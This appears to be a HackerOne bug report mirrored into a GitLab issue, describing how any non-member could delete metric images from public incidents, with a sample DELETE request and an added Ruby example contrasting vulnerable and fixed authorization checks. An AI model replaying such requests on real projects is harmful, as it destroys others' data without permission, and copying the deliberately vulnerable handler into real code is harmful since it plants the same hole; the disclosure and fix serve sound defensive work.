Any gitlab user can Delete all metrics images from incidents without permissions
**[HackerOne report #1107281](https://hackerone.com/reports/1107281)** by `ashish_r_padelkar` on 2021-02-19, assigned to @ngeorge1: [Report](#report) | [How To Reproduce](#how-to-reproduce)

## Report

##### Summary

Hello,

It is possible to delete all metrics images from incidents of public projects as a non-member, without any permissions. When you browse to any incident's metrics images, you won't see a delete option for them. However, it is possible for any guest user to delete these metric images using this vulnerability!

### Pre-requisites

Metrics images are only available on issues of the `Incident` type. You need to create an issue with type `Incident`.

##### Steps to reproduce

1. Log in as a guest user and go to any public project's incident metrics image. For example, `https://gitlab.com/<NameSpace>/<ProjectName>/-/issues/<ID>`, and click on the `Metrics` tab.
2. You won't see a `Delete` option because you don't have any permission to delete this image.
3. Just form a request like the one below.

```
DELETE /api/v4/projects/[REDACTED]/issues/5/metric_images/44 HTTP/1.1
Host: gitlab.com
Connection: close
Accept: application/json, text/plain, */*
X-CSRF-Token: <Replace_your_csrf_Token>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
X-Requested-With: XMLHttpRequest
Origin: https://gitlab.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://gitlab.com/gitlabadminuser/mvn-example/-/issues/2
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en;q=0.9
Cookie: <Replace_Your_Cookies>
```

You need to supply the project ID, issue ID and metrics image ID in the above request. In the above example, `23887195` is the project ID, `5` is the issue ID and `44` is the metric image ID.

4. This will delete the metric image from the issue although you don't have access to do so!
5. This way, you can delete all the public metrics images even if you don't have any access to the project!
##### What is the current *bug* behavior?

Non-members can delete all the public metrics images without permissions!

##### What is the expected *correct* behavior?

Only reporters (or developers) should be able to delete the metrics images within their own projects.

##### Output of checks

This bug happens on GitLab.com

Regards,
Ashish

#### Impact

Any GitLab user can potentially delete all the public metric images from incidents without permission.

## How To Reproduce

Please add [reproducibility information] to this section:

1.
1.
1.

[reproducibility information]: https://about.gitlab.com/handbook/engineering/security/#reproducibility-on-security-issues
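The report's expected behaviour (only reporters or developers within the project may delete a metric image) as a vulnerable-versus-hardened authorization check; this is an added example, not GitLab's code or the reporter's, and the structs, method names and sample data are hypothetical (role names follow GitLab's role ladder).

```ruby
# Added example (not GitLab's code): models the missing authorization check the report
# describes on DELETE .../issues/:iid/metric_images/:id. Structs and data are constructed.
ROLE_RANK = { guest: 10, reporter: 20, developer: 30, maintainer: 40 }.freeze

Project     = Struct.new(:id, :visibility, :members)   # members: { user_id => role }
MetricImage = Struct.new(:id, :issue_iid, :project_id)

module Policy
  # Anyone can read a public project; private projects need membership.
  def self.can_read_project?(project, user_id)
    project.visibility == :public || project.members.key?(user_id)
  end

  # Expected behaviour from the report: only reporters (or above) in the project.
  def self.can_destroy_metric_image?(project, user_id)
    role = project.members[user_id]
    !role.nil? && ROLE_RANK[role] >= ROLE_RANK[:reporter]
  end
end

def find_image(images, project_id, iid, image_id)
  images.find { |m| m.project_id == project_id && m.issue_iid == iid && m.id == image_id }
end

# Vulnerable shape: project visibility is the only gate, so anyone who can see a public incident can delete.
def delete_metric_image_vulnerable(projects, images, user_id, project_id, iid, image_id)
  project = projects[project_id]
  return 404 unless project && Policy.can_read_project?(project, user_id)
  image = find_image(images, project_id, iid, image_id)
  return 404 unless image
  images.delete(image)
  204
end

# Hardened: 404 when the project is not visible (no existence leak), 403 for readers lacking the ability.
def delete_metric_image_fixed(projects, images, user_id, project_id, iid, image_id)
  project = projects[project_id]
  return 404 unless project && Policy.can_read_project?(project, user_id)
  return 403 unless Policy.can_destroy_metric_image?(project, user_id)
  image = find_image(images, project_id, iid, image_id)
  return 404 unless image
  images.delete(image)
  204
end

# Constructed sample: public project 1; user 7 is a reporter, user 8 a guest, user 99 a non-member.
def sample_data
  projects = { 1 => Project.new(1, :public, { 7 => :reporter, 8 => :guest }) }
  images = [MetricImage.new(44, 5, 1), MetricImage.new(45, 5, 1)]
  [projects, images]
end
```

The `403` is returned before the image lookup so that a user who may view the incident but not modify it cannot probe which image ids exist through the error code.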